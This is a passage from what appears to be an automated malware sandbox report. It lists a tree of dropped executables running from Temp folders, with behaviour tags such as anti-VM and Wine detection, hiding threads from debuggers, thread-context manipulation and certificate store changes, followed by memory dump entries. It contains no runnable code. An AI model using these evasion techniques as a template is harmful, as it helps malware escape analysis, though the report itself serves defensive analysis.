                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:3944
                                • C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3988
                                • C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3996
                                • C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10106860101\mAtJWNv.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:4004
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 516
                                  7⤵
                                  • Program crash
                                  PID:4084
                              • C:\Users\Admin\AppData\Local\Temp\10106870101\SvhQA35.exe
                                "C:\Users\Admin\AppData\Local\Temp\10106870101\SvhQA35.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:3276
                                • C:\Users\Admin\AppData\Local\Temp\onefile_3276_133856820825400000\chromium.exe
                                  C:\Users\Admin\AppData\Local\Temp\10106870101\SvhQA35.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3364
                              • C:\Users\Admin\AppData\Local\Temp\10106880101\FvbuInU.exe
                                "C:\Users\Admin\AppData\Local\Temp\10106880101\FvbuInU.exe"
                                6⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Modifies system certificate store
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3736

                    Network

                    MITRE ATT&CK Enterprise v15

                    Downloads

                    • memory/1272-186-0x0000000000400000-0x0000000000465000-memory.dmp

                      Filesize

                      404KB

                    • memory/1272-188-0x0000000000400000-0x0000000000465000-memory.dmp

                      Filesize

                      404KB

                    • memory/1300-84-0x0000000000110000-0x00000000005BF000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/1300-83-0x0000000000110000-0x00000000005BF000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/1576-283-0x000000001B590000-0x000000001B872000-memory.dmp

                      Filesize

                      2.9MB

                    • memory/1576-284-0x00000000027F0000-0x00000000027F8000-memory.dmp

                      Filesize

                      32KB

                    • memory/1700-277-0x000000001B610000-0x000000001B8F2000-memory.dmp

                      Filesize

                      2.9MB

                    • memory/1700-278-0x0000000002860000-0x0000000002868000-memory.dmp

                      Filesize

                      32KB

                    • memory/1740-364-0x0000000000F40000-0x00000000013E9000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/1780-577-0x0000000000AD0000-0x0000000000F2E000-memory.dmp

                      Filesize

                      4.4MB

                    • memory/1780-578-0x0000000000AD0000-0x0000000000F2E000-memory.dmp

                      Filesize

                      4.4MB

                    • memory/2020-143-0x0000000006A30000-0x000000000743A000-memory.dmp

                      Filesize

                      10.0MB

                    • memory/2020-407-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2020-584-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2020-251-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2020-111-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2020-32-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2020-666-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2020-50-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2020-230-0x0000000006A30000-0x0000000007665000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/2020-199-0x0000000006A30000-0x000000000743A000-memory.dmp

                      Filesize

                      10.0MB

                    • memory/2020-207-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2020-145-0x0000000006A30000-0x000000000743A000-memory.dmp

                      Filesize

                      10.0MB

                    • memory/2020-379-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2020-51-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2020-158-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2020-256-0x0000000006A30000-0x0000000007665000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/2020-201-0x0000000006A30000-0x000000000743A000-memory.dmp

                      Filesize

                      10.0MB

                    • memory/2020-622-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2244-205-0x0000000000400000-0x000000000042F000-memory.dmp

                      Filesize

                      188KB

                    • memory/2244-203-0x0000000000400000-0x000000000042F000-memory.dmp

                      Filesize

                      188KB

                    • memory/2244-211-0x0000000010000000-0x000000001001C000-memory.dmp

                      Filesize

                      112KB

                    • memory/2328-172-0x0000000001070000-0x00000000010E8000-memory.dmp

                      Filesize

                      480KB

                    • memory/2332-12-0x00000000064E0000-0x000000000698F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2332-13-0x00000000064E0000-0x000000000698F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2524-80-0x00000000065E0000-0x0000000006A8F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2524-81-0x00000000065E0000-0x0000000006A8F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2548-288-0x0000000000400000-0x000000000042F000-memory.dmp

                      Filesize

                      188KB

                    • memory/2624-382-0x00000000011C0000-0x00000000014D1000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2684-154-0x0000000006640000-0x0000000006AEF000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2728-29-0x0000000000FC0000-0x000000000146F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2728-30-0x0000000006FB0000-0x000000000745F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2728-15-0x0000000000FC0000-0x000000000146F000-memory.dmp

                      Filesize

                      4.7MB

                    • memory/2736-202-0x0000000001240000-0x0000000001C4A000-memory.dmp

                      Filesize

                      10.0MB

                    • memory/2736-144-0x0000000001240000-0x0000000001C4A000-memory.dmp

                      Filesize

                      10.0MB

                    • memory/2736-206-0x0000000001240000-0x0000000001C4A000-memory.dmp

                      Filesize

                      10.0MB

                    • memory/2736-200-0x0000000001240000-0x0000000001C4A000-memory.dmp

                      Filesize

                      10.0MB

                    • memory/2956-285-0x0000000000ED0000-0x0000000001B05000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/2956-252-0x0000000000ED0000-0x0000000001B05000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/2956-287-0x0000000076A90000-0x0000000076B8A000-memory.dmp

                      Filesize

                      1000KB

                    • memory/2956-286-0x0000000076B90000-0x0000000076CAF000-memory.dmp

                      Filesize

                      1.1MB

                    • memory/3176-903-0x000000001B620000-0x000000001B902000-memory.dmp

                      Filesize

                      2.9MB

                    • memory/3176-904-0x0000000001E80000-0x0000000001E88000-memory.dmp

                      Filesize

                      32KB

                    • memory/3324-628-0x00000000000D0000-0x000000000056B000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/3620-639-0x0000000001370000-0x00000000013E0000-memory.dmp

                      Filesize

                      448KB

                    • memory/3656-643-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                    • memory/3656-649-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                    • memory/3656-641-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                    • memory/3656-653-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                    • memory/3656-652-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                    • memory/3656-651-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                      Filesize

                      4KB

                    • memory/3656-645-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                    • memory/3656-647-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                    • memory/3848-663-0x0000000000270000-0x0000000000282000-memory.dmp

                      Filesize

                      72KB

                    • memory/3848-664-0x0000000000240000-0x0000000000250000-memory.dmp

                      Filesize

                      64KB

                    • memory/3944-679-0x0000000000300000-0x0000000000360000-memory.dmp

                      Filesize

                      384KB

                    • memory/4004-681-0x0000000000400000-0x0000000000429000-memory.dmp

                      Filesize

                      164KB

                    • memory/4004-683-0x0000000000400000-0x0000000000429000-memory.dmp

                      Filesize

                      164KB

                    • memory/4004-685-0x0000000000400000-0x0000000000429000-memory.dmp

                      Filesize

                      164KB